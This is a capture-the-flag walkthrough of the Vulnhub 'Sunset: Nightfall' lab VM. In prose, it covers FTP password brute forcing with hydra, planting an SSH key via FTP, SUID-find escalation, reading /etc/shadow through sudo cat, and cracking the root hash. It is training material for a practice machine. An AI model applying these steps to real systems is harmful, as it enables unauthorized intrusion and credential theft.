Sunset: Nightfall Vulnhub Walkthrough
We have another CTF challenges for CTF players that named as “Sunset: nightfall” and it can be download from vulnhub from here. The credit goes to “whitecr0wz” for designing this VM machine for beginners. This is a Linux based CTF challenge where you can use your basic pentest skill for Compromising this VM to escalate the root privilege shell.
Level: Easy
Task: Boot to Root
Penetrating Methodologies
Network Scanning
- Netdiscover
- Nmap
Enumeration
- Enum4linux
Exploiting
- FTP Brute force
- Injecting blank SSH key
- SSH login
Privilege Escalation
- SUID Binaries
- Sudo Rights
Walkthrough
Network Scanning
Let’s begin with the network scan using netdiscover to identify the host machine IP.
And this gave 192.168.0.24 as Host IP, now we will move toward ports and service scan further.
For deep network scan we always prefer to use nmap aggressive scan and this time also we will go with the same approach, thus will run the below command to enumerate running services and open port.
From its scan result, we found that it has multiple open ports for various services but here port 21 i.e. look interesting as it is using pyftplib for ftp.
Enumeration
For more detail we need to start enumeration against the host machine, therefore, we navigate to a web browser for exploring HTTP service but we found nothing at this place.
While enumerating SMB service we found two use name “nightfall” & “matt” with the help of Enum4linux.
Exploiting
Since we have enumerated two usernames let’s go for brute force attack with the help of hydra and try to find its password for login into FTP
Great! “Cheese” is the password of user “matt” let’s use this credential for ftp login.
We logged into FTP successfully, since we were logged inside the host machine but to access proper shell we need to compromise TTY shell, therefore we decide to upload a malicious file inside /var/www/html but unfortunately, we were unable to access that directory.
This is due to pyftplib which is using python library for FTP and might be File sharing is allowed on any particular directory hence we are unable to access /var/www/html directory.
But still we have another approach i.e. SSH key placement which means we will try to inject our created SSH key inside the host machine and access the tty shell of the host machine via ssh and this can be achieved when we will create an .ssh named folder and upload our ssh key inside it.
Thus, in our local machine, we created a ssh key with a blank passphrase using ssh-keygen and it will create two files. Then we copied id_rsa.pub file into another file and named “authorized_keys” and now we need to transfer this file inside the host machine.
As we already have FTP access of the host machine, therefore, it becomes easy to for us to upload authorized_keys inside the .ssh directory which we have created earlier.
So, when we try to connect with ssh as matt user, we got login successfully as shown in the below image. At this phase, we have compromised the host machine and to get access of root shell we need bypass user privileges, therefore without wasting time we try to identify SUID enabled binaries with help of find command.
So, we found /script/find has SUID permissions and it works similarly as Linux-Find utility thus we try to execute /bin/sh command and obtained nightfall shell access.
So, we got access of nightfall shell where we found our 1st flag from inside user.txt file.
But this was limited shell thus to access proper shell as nightfall, we try to apply the previous approach of placing blank passphrase ssh key. Therefore inside /home/nightfall we created a .ssh named folder and upload the authorized_key which we had created previously.
Privilege Escalation
Now repeat the same and try to connect with ssh as nightfall and you will get ssh shell, like us as shown in below image. Further, we check sudo right for nightfall and observe he has sudo right for cat program which means we can read higher privilege such as the shadow.
we have executed the following command for reading shadow file and obtain some hash value.
So, we saved the hash of user: root in a text file and then use john the ripper for cracking hash.
Booomm!! We got user: root password: miguel2
Using above credential i.e. root:miguel2 we got the root shell access and inside /root directory we found our final flag.
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here